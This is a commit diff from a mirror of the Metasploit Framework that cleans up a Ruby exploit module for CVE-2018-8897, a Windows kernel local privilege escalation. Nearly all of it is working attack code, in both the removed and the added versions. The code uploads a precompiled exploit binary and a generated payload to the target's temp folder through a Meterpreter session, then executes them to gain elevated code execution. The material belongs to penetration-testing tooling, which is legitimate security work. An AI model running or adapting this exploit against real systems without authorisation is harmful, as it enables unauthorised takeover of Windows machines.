infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Clean up ruby code for CVE-2018-8897

GSoC/Meterpreter_Web_Console
Wei Chen 2018-07-13 01:06:21 -05:00
parent f02c05e530
commit e1e8444188
1 changed files with 115 additions and 82 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

197
modules/exploits/windows/local/cve_2018_8897_exe.rb
View File

@ -19,22 +19,40 @@ class MetasploitModule < Msf::Exploit::Local
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Windows Kernel Elevation of Privilege Vulnerability', 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',
'Description' => %q{ 'Description' => %q{
This module will upload a precompiled binary that uses CVE-2018-8897 This module exploits a vulnerability in a statement in the system programming guide
to elevate a second binary's privs.) of the Intel 64 and IA-32 architectures software developer's manual being mishandled
in various operating system kerneles, resulting in unexpected behavior for #DB
excpetions that are deferred by MOV SS or POP SS.
This module will upload the pre-compiled exploit and use it to execute the final
payload in order to gain remote code execution.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'Nick Peterson', # Original discovery (@nickeverdox)
'Nemanja Mulasmajic', # Original discovery (@0xNemi)
'Can Bölük <can1357>', # PoC 'Can Bölük <can1357>', # PoC
'bwatters-r7' # msf module 'bwatters-r7' # msf module
], ],
'Platform' => [ 'win' ], 'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ], 'SessionTypes' => [ 'meterpreter' ],
'Targets' => [ [ 'Windows', {} ] ], 'Targets' =>
[
[ 'Windows', {} ]
],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => "May 08 2018", 'DisclosureDate' => 'May 08 2018',
'References' =>
[
['CVE', '2018-8897'],
['EDB', '44697'],
['BID', '104071'],
['URL', 'https://github.com/can1357/CVE-2018-8897/'],
['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']
],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'DisablePayloadHandler' => 'False' 'DisablePayloadHandler' => 'False'
@ -47,90 +65,105 @@ class MetasploitModule < Msf::Exploit::Local
OptString.new('PAYLOAD_NAME', OptString.new('PAYLOAD_NAME',
[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]), [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
OptString.new('PATH', OptString.new('PATH',
[false, 'Path to write binaries (%TEMP% by default).', nil]) [false, 'Path to write binaries (%TEMP% by default).', nil]),
OptInt.new('EXECUTE_DELAY',
[false, 'The number of seconds to delay before executing the exploit', 3])
]) ])
end end
# Exploit method for when exploit command is issued def setup
def exploit super
# Define default values @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) @exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
@payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i)
@temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
@payload_path = "#{temp_path}\\#{payload_name}"
@exploit_path = "#{temp_path}\\#{exploit_name}"
@payload_exe = generate_payload_exe
end
exploit_name = exploit_name + '.exe' if exploit_name[-4,4] != '.exe' def validate_active_host
payload_name = payload_name + '.exe' if payload_name[-4,4] != '.exe'
# Connect to the session
begin begin
host = session.session_host host = session.session_host
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
rescue => e rescue Rex::Post::Meterpreter::RequestError => e
print_error("Could not connect to session: #{e}") elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
return nil raise Msf::Exploit::Failed, 'Could not connect to session'
end
# Generate the exe payload
vprint_status("Generating EXE payload (#{payload_name})")
payload_exe = generate_payload_exe
# Writes script to target host and returns the pathname of the target file or nil if the
# file could not be written.
temppath = datastore['PATH'] || session.sys.config.getenv('TEMP')
payload_path = temppath + "\\" + payload_name
exploit_path = temppath + "\\" + exploit_name
unless directory?(temppath)
print_error("#{temppath} does not exists on the target")
return nil
end
if file?(exploit_path)
print_warning("#{payload_path} already exists on the target. Deleting...")
begin
file_rm(filepath)
print_good("Deleted #{filepath}")
rescue
print_error("Unable to delete file!")
return nil
end
end
# UPLOAD EXPLOIT
begin
#data/exploits/cve-2018-8897-exe/cve-2018-8897-exe.exe
local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')
print_status(local_exploit_path)
upload_file(exploit_path, local_exploit_path)
print_good("Payload uploaded on #{sysinfo['Computer']} to #{exploit_path}")
# Escape windows pathname separators.
#@clean_up_rc << "rm #{exploit_path.gsub(/\\/, '//')}\n"
rescue => exception
vprint_status(exception.backtrace)
print_error("Could not write the exploit on the target")
end
# UPLOAD PAYLOAD
begin
#data/exploits/cve-2018-8897-exe/cve-2018-8897-exe.exe
print_status(payload_path)
write_file(payload_path, payload_exe)
print_good("Payload uploaded on #{sysinfo['Computer']} to #{exploit_path}")
# Escape windows pathname separators.
#@clean_up_rc << "rm #{payload_path.gsub(/\\/, '//')}\n"
rescue => exception
vprint_status(exception.backtrace)
print_error("Could not write the payload on the target")
end
# EXECUTE EXPLOIT
sleep(3)
begin
print_status("Running exploit #{exploit_path} with payload #{payload_path}")
output = cmd_exec("cmd.exe", "/c #{exploit_path} #{payload_path}")
vprint_status(output)
rescue
print_error("Failed to execute payload on target")
execsuccess = false
end end
end end
def validate_remote_path(path)
unless directory?(path)
fail_with(Msf::Exploit::Failure::Unreachable, "#{path} does not exist on the target")
end
end
def validate_target
if sysinfo['OS'] =~ /XP/
fail_with(Msf::Exploit::Failure::Unknown, 'The exploit binary does not support Windows XP')
end
end
def ensure_clean_destination(path)
if file?(path)
print_status("#{path} already exists on the target. Deleting...")
begin
file_rm(path)
print_status("Deleted #{path}")
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_error("Unable to delete #{path}")
end
end
end
def ensure_clean_exploit_destination
ensure_clean_destination(exploit_path)
end
def ensure_clean_payload_destination
ensure_clean_destination(payload_path)
end
def upload_exploit
local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')
upload_file(exploit_path, local_exploit_path)
print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
end
def upload_payload
write_file(payload_path, payload_exe)
print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
end
def execute_exploit
sleep(datastore['EXECUTE_DELAY'])
print_status("Running exploit #{exploit_path} with payload #{payload_path}")
output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}")
vprint_status(output)
end
def exploit
begin
validate_active_host
validate_target
validate_remote_path(temp_path)
ensure_clean_exploit_destination
ensure_clean_payload_destination
upload_exploit
upload_payload
execute_exploit
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_error(e.message)
end
end
attr_reader :exploit_name
attr_reader :payload_name
attr_reader :payload_exe
attr_reader :temp_path
attr_reader :payload_path
attr_reader :exploit_path
end end